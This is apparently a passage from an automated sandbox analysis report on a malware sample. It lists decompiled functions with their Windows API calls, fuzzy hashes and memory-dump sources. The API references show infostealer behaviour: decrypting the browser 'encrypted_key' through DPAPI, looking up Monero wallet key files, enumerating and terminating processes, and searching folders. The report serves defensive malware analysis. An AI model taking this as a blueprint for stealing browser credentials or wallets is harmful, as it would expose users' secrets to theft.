                            • Instruction Fuzzy Hash: 725121B5D101089AEB44FBE4DC96DED733AAF54300F50862DFC1667191EE386A09CBA6
                            Function 00683560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 23480eb6535edf93ec1bd71542cabf95f3f3a181cec0da64a545461649ba0dc5
                            • Instruction ID: c530da1b0d93020b35d928d3744d5f427a5fea3b0614e8f985ac5763b7f98406
                            • Opcode Fuzzy Hash: 23480eb6535edf93ec1bd71542cabf95f3f3a181cec0da64a545461649ba0dc5
                            • Instruction Fuzzy Hash: 254130B1D10109AFDF04FFE4C845AEEB77AAF44704F108219E81676350EB75AA46CFA6
                            Function 00679CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 006799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                              • Part of subcall function 006799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                              • Part of subcall function 006799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                              • Part of subcall function 006799C0: ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                              • Part of subcall function 006799C0: LocalFree.KERNEL32(0067148F), ref: 00679A90
                              • Part of subcall function 006799C0: CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                              • Part of subcall function 00688E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00688E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00679D39
                              • Part of subcall function 00679AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679AEF
                              • Part of subcall function 00679AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00674EEE,00000000,?), ref: 00679B01
                              • Part of subcall function 00679AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679B2A
                              • Part of subcall function 00679AC0: LocalFree.KERNEL32(?,?,?,?,00674EEE,00000000,?), ref: 00679B3F
                              • Part of subcall function 00679B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00679B84
                              • Part of subcall function 00679B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00679BA3
                              • Part of subcall function 00679B60: LocalFree.KERNEL32(?), ref: 00679BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 69b881c5f942f67036effd8b0aa38915b6e1df59910a74d5f1ef4515f2601aa5
                            • Instruction ID: 83fdb31a83c992e707f353eeb5591e5870502b4ee878ed8c7330f8c265a9a6f6
                            • Opcode Fuzzy Hash: 69b881c5f942f67036effd8b0aa38915b6e1df59910a74d5f1ef4515f2601aa5
                            • Instruction Fuzzy Hash: 293150B5D10109ABCF14EBE4DC85AEFB7BAAF48304F14851DE905A7241FB309A04CBB5
                            Function 006894D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 006894EB
                              • Part of subcall function 00688D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0068951E,00000000), ref: 00688D5B
                              • Part of subcall function 00688D50: RtlAllocateHeap.NTDLL(00000000), ref: 00688D62
                              • Part of subcall function 00688D50: wsprintfW.USER32 ref: 00688D78
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006895AB
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 006895C9
                            • CloseHandle.KERNEL32(00000000), ref: 006895D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: 34e6e4b95fea3c4c46d6f614126ce796b0d9f93d635a036d82621c4688fae01c
                            • Instruction ID: 293fc828b2f76428abcede58ad339ea18641b96f58df01ef008c681117c37894
                            • Opcode Fuzzy Hash: 34e6e4b95fea3c4c46d6f614126ce796b0d9f93d635a036d82621c4688fae01c
                            • Instruction Fuzzy Hash: 33314DB1E00208AFDB18EFD0CC49BEDB779FF44300F104659E506AB284DB74AA89CB56
                            Function 00688680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006905B7), ref: 006886CA
                            • Process32First.KERNEL32(?,00000128), ref: 006886DE
                            • Process32Next.KERNEL32(?,00000128), ref: 006886F3
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • CloseHandle.KERNEL32(?), ref: 00688761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 0e7be6a5909aed3eaefcc46251c67c8e98a99835bc7f843f1862bea9d147ab70
                            • Instruction ID: e06f70d9eab2cd9377d1e63c579bd4e01b03c87978fda97287116adb4e0f5cb1
                            • Opcode Fuzzy Hash: 0e7be6a5909aed3eaefcc46251c67c8e98a99835bc7f843f1862bea9d147ab70
                            • Instruction Fuzzy Hash: BD316DB1901218ABDB64EF90CC41FEEB779FB45700F5042AEE50AB21A0DF346A45CFA1
                            Function 00687980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00690E00,00000000,?), ref: 006879B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006879B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00690E00,00000000,?), ref: 006879C4
                            • wsprintfA.USER32 ref: 006879F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: f8c983418e78955b737ac9fad206718a30922128c12724e74ef3e3f0deb370e4
                            • Instruction ID: c8cd86f07ad6188a07a2941c841e8f81c5d55ee5845f57e5fe183a33800d223d
                            • Opcode Fuzzy Hash: f8c983418e78955b737ac9fad206718a30922128c12724e74ef3e3f0deb370e4
                            • Instruction Fuzzy Hash: 091127B2904118ABCB18DFC9DD45BBEB7F8FB4CB11F10421AF605A2280E2399940CBB1
                            Function 0068C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 0068C74E
                              • Part of subcall function 0068BF9F: __amsg_exit.LIBCMT ref: 0068BFAF
                            • __getptd.LIBCMT ref: 0068C765
                            • __amsg_exit.LIBCMT ref: 0068C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0068C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 95b77741dc33f04ee950ad3f64cee4c7c120a291d2bbd66b3b5b96a9c8d5c4ad
                            • Instruction ID: 03757ef1e2f1a2649c39623c230ed3fe0bd7029076ca926b1d19f6129c9e863f
                            • Opcode Fuzzy Hash: 95b77741dc33f04ee950ad3f64cee4c7c120a291d2bbd66b3b5b96a9c8d5c4ad
                            • Instruction Fuzzy Hash: F3F090329446109BD7A0BFB85807B8D33A3AF00730F21534EF604A62D2DB745941DF6E
                            Function 00684F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00688DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00688E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00684F7A
                            • lstrcat.KERNEL32(?,00691070), ref: 00684F97
                            • lstrcat.KERNEL32(?,012B8BA8), ref: 00684FAB
                            • lstrcat.KERNEL32(?,00691074), ref: 00684FBD
                              • Part of subcall function 00684910: wsprintfA.USER32 ref: 0068492C
                              • Part of subcall function 00684910: FindFirstFileA.KERNEL32(?,?), ref: 00684943
                              • Part of subcall function 00684910: StrCmpCA.SHLWAPI(?,00690FDC), ref: 00684971
                              • Part of subcall function 00684910: StrCmpCA.SHLWAPI(?,00690FE0), ref: 00684987
                              • Part of subcall function 00684910: FindNextFileA.KERNEL32(000000FF,?), ref: 00684B7D
                              • Part of subcall function 00684910: FindClose.KERNEL32(000000FF), ref: 00684B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: ce4651187132bdc4ade57111174aab28dba7e394c334157377c8e537bdfa5d19
                            • Instruction ID: 8f8d4a76c3f070bad2d4b226b54c8057ac8167a5d958962a0d60f6afdc3b652b
                            • Opcode Fuzzy Hash: ce4651187132bdc4ade57111174aab28dba7e394c334157377c8e537bdfa5d19
                            • Instruction Fuzzy Hash: 5021CBB69002046BDB98F7B0DC46EED333DBB54300F404799B64957581EE7597C88B96